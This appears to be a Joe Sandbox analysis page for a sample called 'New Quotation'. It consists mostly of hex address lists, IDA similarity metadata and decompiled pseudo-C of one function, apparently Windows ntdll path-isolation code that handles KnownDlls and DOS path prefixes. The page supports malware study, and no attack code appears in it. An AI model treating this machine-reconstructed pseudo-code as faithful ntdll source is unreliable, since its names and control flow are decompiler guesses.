                                                                                                                                                                                          0x1d859a27
                                                                                                                                                                                          0x1d859a2c
                                                                                                                                                                                          0x1d859a30
                                                                                                                                                                                          0x1d859a3e
                                                                                                                                                                                          0x1d859a44
                                                                                                                                                                                          0x1d859a45
                                                                                                                                                                                          0x1d859a4c
                                                                                                                                                                                          0x1d859a5f
                                                                                                                                                                                          0x1d859a72
                                                                                                                                                                                          0x1d859a77
                                                                                                                                                                                          0x1d859a7b
                                                                                                                                                                                          0x1d859a8d
                                                                                                                                                                                          0x1d859a92
                                                                                                                                                                                          0x1d859a96
                                                                                                                                                                                          0x1d859aa9
                                                                                                                                                                                          0x1d859ab1
                                                                                                                                                                                          0x1d859ab2
                                                                                                                                                                                          0x1d859ab3
                                                                                                                                                                                          0x1d859abf
                                                                                                                                                                                          0x1d859ac0
                                                                                                                                                                                          0x1d859acc
                                                                                                                                                                                          0x1d859ace
                                                                                                                                                                                          0x1d859acf
                                                                                                                                                                                          0x1d859ad1
                                                                                                                                                                                          0x1d859ad1
                                                                                                                                                                                          0x1d859adc
                                                                                                                                                                                          0x1d859ae6
                                                                                                                                                                                          0x1d859af2
                                                                                                                                                                                          0x1d859af9
                                                                                                                                                                                          0x1d859aff
                                                                                                                                                                                          0x1d859b00
                                                                                                                                                                                          0x1d859b0a
                                                                                                                                                                                          0x1d859b10
                                                                                                                                                                                          0x1d859b16
                                                                                                                                                                                          0x1d859b1d
                                                                                                                                                                                          0x1d859b37
                                                                                                                                                                                          0x1d859b39
                                                                                                                                                                                          0x1d859b41
                                                                                                                                                                                          0x1d859b48
                                                                                                                                                                                          0x1d859b49
                                                                                                                                                                                          0x1d859b54
                                                                                                                                                                                          0x1d859b5a
                                                                                                                                                                                          0x1d859b5c
                                                                                                                                                                                          0x1d859b5e
                                                                                                                                                                                          0x1d859b6e
                                                                                                                                                                                          0x1d859b7a
                                                                                                                                                                                          0x1d859b7f
                                                                                                                                                                                          0x1d859b81
                                                                                                                                                                                          0x1d859b82
                                                                                                                                                                                          0x1d859b83
                                                                                                                                                                                          0x1d859b85
                                                                                                                                                                                          0x1d859b8b
                                                                                                                                                                                          0x1d859b8d
                                                                                                                                                                                          0x1d859b8f
                                                                                                                                                                                          0x1d859b97
                                                                                                                                                                                          0x1d859b9d
                                                                                                                                                                                          0x1d859ba5
                                                                                                                                                                                          0x1d859bb2
                                                                                                                                                                                          0x1d859bbe
                                                                                                                                                                                          0x1d859bc9
                                                                                                                                                                                          0x1d859bd0
                                                                                                                                                                                          0x1d859bdf
                                                                                                                                                                                          0x1d859be4
                                                                                                                                                                                          0x1d859bf1
                                                                                                                                                                                          0x1d859bf3
                                                                                                                                                                                          0x1d859bfb
                                                                                                                                                                                          0x1d859bfd
                                                                                                                                                                                          0x1d859c06
                                                                                                                                                                                          0x1d859c09
                                                                                                                                                                                          0x1d859c0a
                                                                                                                                                                                          0x1d859c0b
                                                                                                                                                                                          0x1d859c12
                                                                                                                                                                                          0x1d859c13
                                                                                                                                                                                          0x1d859c15
                                                                                                                                                                                          0x1d859c20
                                                                                                                                                                                          0x1d859c25
                                                                                                                                                                                          0x1d859c27
                                                                                                                                                                                          0x1d85a0a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859c2d
                                                                                                                                                                                          0x1d859c33
                                                                                                                                                                                          0x1d859c38
                                                                                                                                                                                          0x1d859c3e
                                                                                                                                                                                          0x1d859c40
                                                                                                                                                                                          0x1d859c46
                                                                                                                                                                                          0x1d859c48
                                                                                                                                                                                          0x1d859c5a
                                                                                                                                                                                          0x1d859c5d
                                                                                                                                                                                          0x1d859c63
                                                                                                                                                                                          0x1d859c69
                                                                                                                                                                                          0x1d859c6f
                                                                                                                                                                                          0x1d859c73
                                                                                                                                                                                          0x1d859c78
                                                                                                                                                                                          0x1d859c7d
                                                                                                                                                                                          0x1d859c81
                                                                                                                                                                                          0x1d859c84
                                                                                                                                                                                          0x1d859c87
                                                                                                                                                                                          0x1d859c92
                                                                                                                                                                                          0x1d859c92
                                                                                                                                                                                          0x1d859c95
                                                                                                                                                                                          0x1d859c96
                                                                                                                                                                                          0x1d859c99
                                                                                                                                                                                          0x1d859c99
                                                                                                                                                                                          0x1d859c9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859c9d
                                                                                                                                                                                          0x1d859ca0
                                                                                                                                                                                          0x1d859cac
                                                                                                                                                                                          0x1d859cac
                                                                                                                                                                                          0x1d859cb1
                                                                                                                                                                                          0x1d859cbc
                                                                                                                                                                                          0x1d859cc4
                                                                                                                                                                                          0x1d859ccf
                                                                                                                                                                                          0x1d859ca2
                                                                                                                                                                                          0x1d859ca2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859ca2
                                                                                                                                                                                          0x1d859ce0
                                                                                                                                                                                          0x1d859ce0
                                                                                                                                                                                          0x1d859ce6
                                                                                                                                                                                          0x1d859ce9
                                                                                                                                                                                          0x1d859ceb
                                                                                                                                                                                          0x1d859ced
                                                                                                                                                                                          0x1d859ced
                                                                                                                                                                                          0x1d859ced
                                                                                                                                                                                          0x1d859cf3
                                                                                                                                                                                          0x1d859cfb
                                                                                                                                                                                          0x1d859d0a
                                                                                                                                                                                          0x1d859d0d
                                                                                                                                                                                          0x1d859d12
                                                                                                                                                                                          0x1d859d15
                                                                                                                                                                                          0x1d859d1b
                                                                                                                                                                                          0x1d859d1e
                                                                                                                                                                                          0x1d859d20
                                                                                                                                                                                          0x1d859d23
                                                                                                                                                                                          0x1d859d27
                                                                                                                                                                                          0x1d859d28
                                                                                                                                                                                          0x1d859d2b
                                                                                                                                                                                          0x1d859d33
                                                                                                                                                                                          0x1d859d3c
                                                                                                                                                                                          0x1d859d3e
                                                                                                                                                                                          0x1d859d40
                                                                                                                                                                                          0x1d859d4a
                                                                                                                                                                                          0x1d859d4b
                                                                                                                                                                                          0x1d859d4c
                                                                                                                                                                                          0x1d859d52
                                                                                                                                                                                          0x1d859d57
                                                                                                                                                                                          0x1d859d59
                                                                                                                                                                                          0x1d859d62
                                                                                                                                                                                          0x1d859d68
                                                                                                                                                                                          0x1d859d6a
                                                                                                                                                                                          0x1d859d6c
                                                                                                                                                                                          0x1d859d6c
                                                                                                                                                                                          0x1d859d6c
                                                                                                                                                                                          0x1d859d6c
                                                                                                                                                                                          0x1d859d77
                                                                                                                                                                                          0x1d859d7b
                                                                                                                                                                                          0x1d859d7d
                                                                                                                                                                                          0x1d859d7d
                                                                                                                                                                                          0x1d859d7d
                                                                                                                                                                                          0x1d859d7d
                                                                                                                                                                                          0x1d859d84
                                                                                                                                                                                          0x1d859d86
                                                                                                                                                                                          0x1d859d88
                                                                                                                                                                                          0x1d859d8a
                                                                                                                                                                                          0x1d859d8a
                                                                                                                                                                                          0x1d859da0
                                                                                                                                                                                          0x1d859da2
                                                                                                                                                                                          0x1d859dc8
                                                                                                                                                                                          0x1d859ddb
                                                                                                                                                                                          0x1d859ddd
                                                                                                                                                                                          0x1d859ddf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859de1
                                                                                                                                                                                          0x1d859de3
                                                                                                                                                                                          0x1d859dec
                                                                                                                                                                                          0x1d859df2
                                                                                                                                                                                          0x1d859df5
                                                                                                                                                                                          0x1d859ec2
                                                                                                                                                                                          0x1d859ec2
                                                                                                                                                                                          0x1d859ec5
                                                                                                                                                                                          0x1d859ece
                                                                                                                                                                                          0x1d859ed1
                                                                                                                                                                                          0x1d859f1f
                                                                                                                                                                                          0x1d859f1f
                                                                                                                                                                                          0x1d859f25
                                                                                                                                                                                          0x1d859f30
                                                                                                                                                                                          0x1d859f35
                                                                                                                                                                                          0x1d859f35
                                                                                                                                                                                          0x1d859f35
                                                                                                                                                                                          0x1d859f35
                                                                                                                                                                                          0x1d859f42
                                                                                                                                                                                          0x1d859f48
                                                                                                                                                                                          0x1d859f54
                                                                                                                                                                                          0x1d859f60
                                                                                                                                                                                          0x1d859f6c
                                                                                                                                                                                          0x1d859f78
                                                                                                                                                                                          0x1d859f79
                                                                                                                                                                                          0x1d859f7b
                                                                                                                                                                                          0x1d859f85
                                                                                                                                                                                          0x1d859f8f
                                                                                                                                                                                          0x1d859f99
                                                                                                                                                                                          0x1d859fa3
                                                                                                                                                                                          0x1d859fad
                                                                                                                                                                                          0x1d859fb7
                                                                                                                                                                                          0x1d859fc1
                                                                                                                                                                                          0x1d859fcb
                                                                                                                                                                                          0x1d859fd5
                                                                                                                                                                                          0x1d859fdf
                                                                                                                                                                                          0x1d859fe9
                                                                                                                                                                                          0x1d859ff3
                                                                                                                                                                                          0x1d859ffd
                                                                                                                                                                                          0x1d85a003
                                                                                                                                                                                          0x1d85a009
                                                                                                                                                                                          0x1d85a00f
                                                                                                                                                                                          0x1d85a014
                                                                                                                                                                                          0x1d85a016
                                                                                                                                                                                          0x1d85a028
                                                                                                                                                                                          0x1d85a02e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85a030
                                                                                                                                                                                          0x1d85a030
                                                                                                                                                                                          0x1d85a036
                                                                                                                                                                                          0x1d85a038
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85a03a
                                                                                                                                                                                          0x1d85a03a
                                                                                                                                                                                          0x1d85a03d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85a03f
                                                                                                                                                                                          0x1d85a03f
                                                                                                                                                                                          0x1d85a045
                                                                                                                                                                                          0x1d85a047
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85a049
                                                                                                                                                                                          0x1d85a049
                                                                                                                                                                                          0x1d85a04c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85a04e
                                                                                                                                                                                          0x1d85a05d
                                                                                                                                                                                          0x1d85a05e
                                                                                                                                                                                          0x1d85a060
                                                                                                                                                                                          0x1d85a068
                                                                                                                                                                                          0x1d85a06d
                                                                                                                                                                                          0x1d85a072
                                                                                                                                                                                          0x1d85a075
                                                                                                                                                                                          0x1d85a07a
                                                                                                                                                                                          0x1d85a07d
                                                                                                                                                                                          0x1d85a085
                                                                                                                                                                                          0x1d85a088
                                                                                                                                                                                          0x1d85a08f
                                                                                                                                                                                          0x1d85a095
                                                                                                                                                                                          0x1d85a09a
                                                                                                                                                                                          0x1d85a09a
                                                                                                                                                                                          0x1d85a04c
                                                                                                                                                                                          0x1d85a047
                                                                                                                                                                                          0x1d85a03d
                                                                                                                                                                                          0x1d85a038
                                                                                                                                                                                          0x1d85a018
                                                                                                                                                                                          0x1d85a018
                                                                                                                                                                                          0x1d85a018
                                                                                                                                                                                          0x1d85a018
                                                                                                                                                                                          0x1d859ed3
                                                                                                                                                                                          0x1d859ed9
                                                                                                                                                                                          0x1d859ef3
                                                                                                                                                                                          0x1d859efe
                                                                                                                                                                                          0x1d859f0b
                                                                                                                                                                                          0x1d859f0d
                                                                                                                                                                                          0x1d859f0f
                                                                                                                                                                                          0x1d859f15
                                                                                                                                                                                          0x1d859f15
                                                                                                                                                                                          0x1d859f15
                                                                                                                                                                                          0x1d859f1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859f1c
                                                                                                                                                                                          0x1d859f0f
                                                                                                                                                                                          0x1d859dfb
                                                                                                                                                                                          0x1d859e06
                                                                                                                                                                                          0x1d859e0b
                                                                                                                                                                                          0x1d859e0e
                                                                                                                                                                                          0x1d859e1f
                                                                                                                                                                                          0x1d859e21
                                                                                                                                                                                          0x1d859e23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e29
                                                                                                                                                                                          0x1d859e29
                                                                                                                                                                                          0x1d859e30
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e36
                                                                                                                                                                                          0x1d859e3c
                                                                                                                                                                                          0x1d859e3e
                                                                                                                                                                                          0x1d859e3e
                                                                                                                                                                                          0x1d859e40
                                                                                                                                                                                          0x1d859e46
                                                                                                                                                                                          0x1d859e54
                                                                                                                                                                                          0x1d859e5f
                                                                                                                                                                                          0x1d859e61
                                                                                                                                                                                          0x1d859e63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e69
                                                                                                                                                                                          0x1d859e6c
                                                                                                                                                                                          0x1d859e6e
                                                                                                                                                                                          0x1d859e70
                                                                                                                                                                                          0x1d859e80
                                                                                                                                                                                          0x1d859e81
                                                                                                                                                                                          0x1d859e8d
                                                                                                                                                                                          0x1d859e94
                                                                                                                                                                                          0x1d859e95
                                                                                                                                                                                          0x1d859e97
                                                                                                                                                                                          0x1d859e9c
                                                                                                                                                                                          0x1d859ea1
                                                                                                                                                                                          0x1d859ea3
                                                                                                                                                                                          0x1d859ea5
                                                                                                                                                                                          0x1d859ead
                                                                                                                                                                                          0x1d859ead
                                                                                                                                                                                          0x1d859eb8
                                                                                                                                                                                          0x1d859eb8
                                                                                                                                                                                          0x1d859eba
                                                                                                                                                                                          0x1d859ebc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e72
                                                                                                                                                                                          0x1d859e72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859e46
                                                                                                                                                                                          0x1d859e30
                                                                                                                                                                                          0x1d859e23
                                                                                                                                                                                          0x1d859df5
                                                                                                                                                                                          0x1d859da4
                                                                                                                                                                                          0x1d859da4
                                                                                                                                                                                          0x1d859dab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859dad
                                                                                                                                                                                          0x1d859dad
                                                                                                                                                                                          0x1d859db2
                                                                                                                                                                                          0x1d859db3
                                                                                                                                                                                          0x1d859db5
                                                                                                                                                                                          0x1d859dbd
                                                                                                                                                                                          0x1d859dbe
                                                                                                                                                                                          0x1d859dbe
                                                                                                                                                                                          0x1d859dbe
                                                                                                                                                                                          0x1d859dab
                                                                                                                                                                                          0x1d859d5b
                                                                                                                                                                                          0x1d859d5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859d5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859d59
                                                                                                                                                                                          0x1d859ca7
                                                                                                                                                                                          0x1d859caa
                                                                                                                                                                                          0x1d859cd8
                                                                                                                                                                                          0x1d859cdd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859c4a
                                                                                                                                                                                          0x1d859c4a
                                                                                                                                                                                          0x1d859c4a
                                                                                                                                                                                          0x1d85a0ac
                                                                                                                                                                                          0x1d85a0ac
                                                                                                                                                                                          0x1d85a0ac
                                                                                                                                                                                          0x1d85a0ac
                                                                                                                                                                                          0x1d859c48
                                                                                                                                                                                          0x1d859c27
                                                                                                                                                                                          0x1d859b60
                                                                                                                                                                                          0x1d859b60
                                                                                                                                                                                          0x1d859b66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d859b6c
                                                                                                                                                                                          0x1d859b66
                                                                                                                                                                                          0x1d859b2d
                                                                                                                                                                                          0x1d859b2d
                                                                                                                                                                                          0x1d859b2d
                                                                                                                                                                                          0x1d859b2d
                                                                                                                                                                                          0x1d859b1d
                                                                                                                                                                                          0x1d859a96
                                                                                                                                                                                          0x1d859a7b
                                                                                                                                                                                          0x1d859a30
                                                                                                                                                                                          0x1d8599db
                                                                                                                                                                                          0x1d85a0ae
                                                                                                                                                                                          0x1d85a0b5
                                                                                                                                                                                          0x1d85a0b7
                                                                                                                                                                                          0x1d85a0bd
                                                                                                                                                                                          0x1d85a0bf
                                                                                                                                                                                          0x1d85a0c4
                                                                                                                                                                                          0x1d85a0c4
                                                                                                                                                                                          0x1d85a0ce
                                                                                                                                                                                          0x1d85a0d0
                                                                                                                                                                                          0x1d85a0d6
                                                                                                                                                                                          0x1d85a0d6
                                                                                                                                                                                          0x1d85a0e2
                                                                                                                                                                                          0x1d85a0e4
                                                                                                                                                                                          0x1d85a0ea
                                                                                                                                                                                          0x1d85a0ea
                                                                                                                                                                                          0x1d85a0f6
                                                                                                                                                                                          0x1d85a0f8
                                                                                                                                                                                          0x1d85a0fe
                                                                                                                                                                                          0x1d85a0fe
                                                                                                                                                                                          0x1d85a10a
                                                                                                                                                                                          0x1d85a10c
                                                                                                                                                                                          0x1d85a112
                                                                                                                                                                                          0x1d85a112
                                                                                                                                                                                          0x1d85a127

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                                                                          • API String ID: 3446177414-3127649145
                                                                                                                                                                                          • Opcode ID: 7ee0609cf56096fc2a65ac18de9e32e2a7630cd488e73445d5baed6d53ac86c0
                                                                                                                                                                                          • Instruction ID: fae703dc09582e49908333f97e19c34977d9728d998ad0c21adb75f05cf77c95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee0609cf56096fc2a65ac18de9e32e2a7630cd488e73445d5baed6d53ac86c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29322874A01719DFDB61DF65CC88B9AB7F8FF44300F1142AAE509A7250DB71AA88CF52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E9870 Relevance: 6.7, Strings: 5, Instructions: 462COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D7E9870(signed char _a4, signed char* _a8, signed char* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, signed int _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				char _v140;
				short _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				signed int _v200;
				short* _v204;
				short* _v208;
				short* _v212;
				signed int _v214;
				char _v216;
				short _v224;
				short _v228;
				short* _v232;
				signed short* _v236;
				signed short* _v240;
				short _v242;
				char _v244;
				signed int _v260;
				signed short* _v264;
				char _v268;
				char* _v272;
				char _v276;
				char _v280;
				char _v284;
				signed int _v288;
				intOrPtr* _v292;
				intOrPtr _v296;
				intOrPtr _v298;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed short _v312;
				char _v316;
				signed int _v320;
				signed short _v324;
				signed short* _v328;
				intOrPtr _v330;
				signed int _v332;
				void* _v333;
				char _v334;
				void* _v340;
				void* _v344;
				void* _v348;
				void* _v349;
				void* _v350;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t185;
				signed short* _t186;
				char* _t188;
				intOrPtr _t190;
				signed short* _t193;
				short* _t194;
				intOrPtr _t200;
				short* _t201;
				signed short* _t211;
				char _t232;
				signed int _t233;
				signed short* _t240;
				signed int _t241;
				signed int _t244;
				short* _t255;
				intOrPtr _t262;
				void* _t263;
				signed int _t269;
				intOrPtr* _t273;
				void* _t274;
				intOrPtr* _t275;
				intOrPtr* _t277;
				void* _t278;
				void* _t279;
				signed short* _t280;
				void* _t281;
				signed int _t283;
				signed int _t285;

				_t285 = (_t283 & 0xfffffff8) - 0x14c;
				_v8 =  *0x1d8cb370 ^ _t285;
				_t270 = _a28;
				_t266 = _a8;
				_t185 = _a36;
				_v288 = _t270;
				_v316 = 0;
				_v312 = 0;
				_t277 = _a32;
				_v272 =  &_v140;
				_v292 = _t277;
				_v276 = 0x800000;
				_v280 = 0;
				_v324 = 0;
				_v304 = 0;
				_t273 = _a20;
				if(_t270 != 0) {
					 *_t270 = 0;
				}
				if(_t277 != 0) {
					 *_t277 = 0;
				}
				if(_t185 != 0) {
					 *_t185 = 0x208;
				}
				if(_t273 != 0) {
					 *_t273 = 0;
					 *((intOrPtr*)(_t273 + 4)) = 0;
				}
				_t262 = _a16;
				_t186 =  &_v172;
				_v236 = _t186;
				_v232 = _t186;
				_v240 = _t186;
				_v228 = 0x20;
				_v224 = 0x20;
				_v172 = 0;
				_v244 = 0x200000;
				if(_t262 == 0) {
					_t188 =  &_v192;
					_v200 = 2;
					_v208 = _t188;
					_v204 = _t188;
					_v212 = _t188;
					_v196 = 2;
					_v192 = 0;
					_v216 = 0x20000;
				} else {
					_t255 =  *((intOrPtr*)(_t262 + 4));
					if(( *(_t262 + 2) & 0x0000ffff) < 2) {
						_t255 =  &_v192;
						_t270 = 2;
					}
					_v208 = _t255;
					_v200 = _t270;
					_v204 = _t255;
					_v196 = _t270;
					_v212 = _t255;
					if(_t255 != 0) {
						 *_t255 = 0;
						_t277 = _v292;
					}
					_v214 = _t270;
					_v216 = 0;
				}
				_t190 = _a24;
				_v188 = _t262;
				_v184 = _t273;
				_v180 = _t190;
				_v176 = 1;
				if((_a4 & 0xfffffffe) != 0) {
					_t278 = 0xc000000d;
					goto L82;
				} else {
					if(_t266 == 0) {
						_t278 = 0xc000000d;
						L82:
						if(_t278 >= 0) {
							L57:
							_t191 = _v312;
							if(_v312 != 0) {
								E1D7CBA80(_t191);
								_v320 = 0;
								_v316 = 0;
							}
							_t193 = _v236;
							if(_t193 != 0) {
								if(_t193 != _v232) {
									_v264 = _t193;
									E1D7E3B90( &_v268);
								}
								_v236 = _v232;
								_v228 = _v224;
							}
							_t194 = _v232;
							_v240 = _t194;
							if(_t194 != 0) {
								_t266 = 0;
								 *_t194 = 0;
							}
							_v244 = 0;
							_v242 = _v224;
							if(_t278 == 0xc0150001) {
								E1D86FD60(_t266, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x1b2, "Status != STATUS_SXS_SECTION_NOT_FOUND");
								_t278 = 0xc00000e5;
								goto L82;
							} else {
								_pop(_t274);
								_pop(_t279);
								_pop(_t263);
								return E1D814B50(_t278, _t263, _v8 ^ _t285, _t270, _t274, _t279);
							}
						}
						L51:
						if(_v176 != 0) {
							_t200 = _v208;
							if(_t200 != 0 && _t200 != _v204) {
								_v296 = _t200;
								E1D7E3B90( &_v300);
							}
							_t201 = _v204;
							if(_t201 != 0) {
								_t266 = 0;
								 *_t201 = 0;
							}
						}
						E1D818F40( &_v216, 0, 0x2c);
						_t285 = _t285 + 0xc;
						goto L57;
					}
					if(_t262 == 0) {
						if(_t273 != 0 || _t277 == 0) {
							L15:
							_t270 = 0;
							_v332 =  *_t266;
							_t211 = _t266[4];
							_t266 = _a12;
							_v328 = _t211;
							_v333 = 0;
							if(_t266 == 0 ||  *_t266 == 0) {
								L23:
								_t278 = 0;
								goto L24;
							} else {
								_v334 = 0;
								_t281 = E1D7EAA60(1,  &_v332, 0x1d7a1164,  &_v284);
								if(_t281 < 0) {
									if(_t281 == 0xc0000225) {
										L19:
										_t278 = 0;
										L20:
										if(_t278 < 0) {
											L97:
											_t211 = _v328;
											_t270 = _v333;
											L24:
											if(_t278 < 0) {
												goto L51;
											}
											if(_t270 != 0) {
												_v332 = _v244;
												_t211 = _v240;
												_v328 = _t211;
											}
											_v320 = 0;
											_v334 = 0;
											if(_v312 != 0) {
												_t278 = 0xc000000d;
												goto L42;
											} else {
												_t266 = _v332;
												if(_t266 < 2) {
													L30:
													if(_t266 < 4 ||  *_t211 == 0 || _t211[1] != 0x3a || _t266 < 6) {
														L40:
														_t232 = _v334;
														goto L41;
													} else {
														_t233 = _t211[2] & 0x0000ffff;
														if(_t233 != 0x5c) {
															if(_t233 != 0x2f) {
																goto L40;
															}
														}
														_v308 = 2;
														L36:
														_t278 = E1D7E9690( &_v332,  &_v276,  &_v316,  &_v320, 0, 0,  &_v308, 0);
														if(_t278 < 0) {
															L42:
															_t213 = _v312;
															if(_v312 != 0) {
																E1D7CBA80(_t213);
																_v320 = 0;
																_v316 = 0;
															}
															L43:
															if(_t278 < 0) {
																goto L51;
															}
															if((_a4 & 0x00000001) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x10)) == 0 || ( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00001000) == 0) {
																L47:
																if((_v304 & 0x00000001) != 0) {
																	L77:
																	if(_t273 == 0) {
																		if(_t262 == 0 || _v212 ==  *((intOrPtr*)(_t262 + 4))) {
																			goto L78;
																		} else {
																			_t278 = 0xc0000023;
																			goto L82;
																		}
																	}
																	L78:
																	_t275 = _v292;
																	if(_t275 != 0) {
																		_t278 = E1D7EAA60(1,  &_v216, 0x1d7a1890,  &_v324);
																		if(_t278 < 0) {
																			goto L51;
																		}
																		 *_t275 = ((_v324 & 0x0000ffff) >> 1) + 1;
																	}
																	_t266 =  &_v216;
																	_t278 = E1D80BA84( &_v216);
																	if(_t278 < 0) {
																		goto L51;
																	}
																	_t266 = _v288;
																	if(_t266 != 0) {
																		 *_t266 = _v304;
																	}
																	_t278 = 0;
																	goto L82;
																}
																if(_t262 == 0) {
																	if(_t273 != 0) {
																		goto L49;
																	}
																	_t270 = 1;
																	L50:
																	_t266 =  &_v332;
																	_t278 = E1D7E9DD0( &_v332, _t270,  &_v280, _v288,  &_v216);
																	if(_t278 >= 0) {
																		goto L77;
																	}
																	goto L51;
																}
																L49:
																_t270 = 0;
																goto L50;
															} else {
																_t270 =  &_v216;
																_t266 =  &_v332;
																_t278 = E1D85D8B3( &_v332,  &_v216,  &_v304);
																if(_t278 < 0) {
																	goto L51;
																}
																goto L47;
															}
														}
														_t270 = _v320;
														_t269 =  *_t270;
														_t280 =  *((intOrPtr*)(_t270 + 4));
														_v320 = _t269;
														_v264 = _t280;
														_v300 = _t269;
														if(_v308 == 6) {
															_t240 = _v328;
															if( *((short*)(_t240 + 0xa)) != 0x3a ||  *((short*)(_t240 + 0xc)) != 0x5c) {
																goto L38;
															} else {
																_v330 = _v330 + 0xfff8;
																_t241 = _v332 + 0xfff8;
																_v328 =  &(_v328[4]);
																_t266 = _t269 + 0xfffffff8;
																_t280 = _t280 + 8;
																_v300 = _t266;
																_v298 = _v298 + 0xfff8;
																_v320 = _v300;
																_t262 = _a16;
																_v332 = _t241;
																L39:
																if(_t241 > _t266) {
																	if(_t270 ==  &_v316) {
																		_t232 = 1;
																	} else {
																		_t232 = _v334;
																	}
																	_t266 = _v320;
																	_v332 = _v320;
																	_v328 = _t280;
																	L41:
																	_t278 = 0;
																	if(_t232 != 0) {
																		goto L43;
																	}
																	goto L42;
																}
																goto L40;
															}
														}
														L38:
														_t241 = _v332;
														_t266 = _v300;
														goto L39;
													}
												}
												_t270 =  *_t211 & 0x0000ffff;
												if(_t270 == 0x5c || _t270 == 0x2f) {
													if(_t266 < 4) {
														goto L40;
													}
													_t270 = _t211[1] & 0x0000ffff;
													if(_t270 == 0x5c || _t270 == 0x2f) {
														if(_t266 < 6) {
															L110:
															_v308 = 1;
															goto L36;
														}
														_t270 = _t211[2] & 0x0000ffff;
														if(_t270 == 0x2e || _t270 == 0x3f) {
															if(_t266 < 8) {
																L109:
																if(_t266 == 6) {
																	goto L40;
																}
																goto L110;
															}
															_t244 = _t211[3] & 0x0000ffff;
															if(_t244 == 0x5c || _t244 == 0x2f) {
																_v308 = 6;
																goto L36;
															} else {
																goto L109;
															}
														} else {
															goto L110;
														}
													} else {
														goto L40;
													}
												} else {
													goto L30;
												}
											}
										}
										if(_v334 == 0) {
											_t266 = _a12;
											_v260 = _v332;
											 *((intOrPtr*)(_t285 + 0x5c)) = _v328;
											 *(_t285 + 0x60) =  *_t266;
											 *(_t285 + 0x64) = _t266[4];
											_t278 = E1D8013E0(_t266,  &_v244, 2,  &_v260);
											if(_t278 < 0) {
												goto L97;
											}
											_t211 = _v328;
											_t270 = 1;
											goto L23;
										}
										_t211 = _v328;
										_t270 = _v333;
										goto L23;
									}
									goto L20;
								}
								_v334 = 1;
								goto L19;
							}
						} else {
							L96:
							_t278 = 0xc000000d;
							goto L82;
						}
					}
					if(_t273 == 0 || _t190 != 0) {
						goto L15;
					} else {
						goto L96;
					}
				}
			}




















































































                                                                                                                                                                                          0x1d7e9878
                                                                                                                                                                                          0x1d7e9885
                                                                                                                                                                                          0x1d7e988c
                                                                                                                                                                                          0x1d7e988f
                                                                                                                                                                                          0x1d7e9892
                                                                                                                                                                                          0x1d7e9898
                                                                                                                                                                                          0x1d7e989c
                                                                                                                                                                                          0x1d7e98a0
                                                                                                                                                                                          0x1d7e98ac
                                                                                                                                                                                          0x1d7e98af
                                                                                                                                                                                          0x1d7e98b5
                                                                                                                                                                                          0x1d7e98b9
                                                                                                                                                                                          0x1d7e98c1
                                                                                                                                                                                          0x1d7e98c9
                                                                                                                                                                                          0x1d7e98ce
                                                                                                                                                                                          0x1d7e98d3
                                                                                                                                                                                          0x1d7e98d8
                                                                                                                                                                                          0x1d7e9d36
                                                                                                                                                                                          0x1d7e9d36
                                                                                                                                                                                          0x1d7e98e0
                                                                                                                                                                                          0x1d7e9d9b
                                                                                                                                                                                          0x1d7e9d9b
                                                                                                                                                                                          0x1d7e98e8
                                                                                                                                                                                          0x1d7e9da2
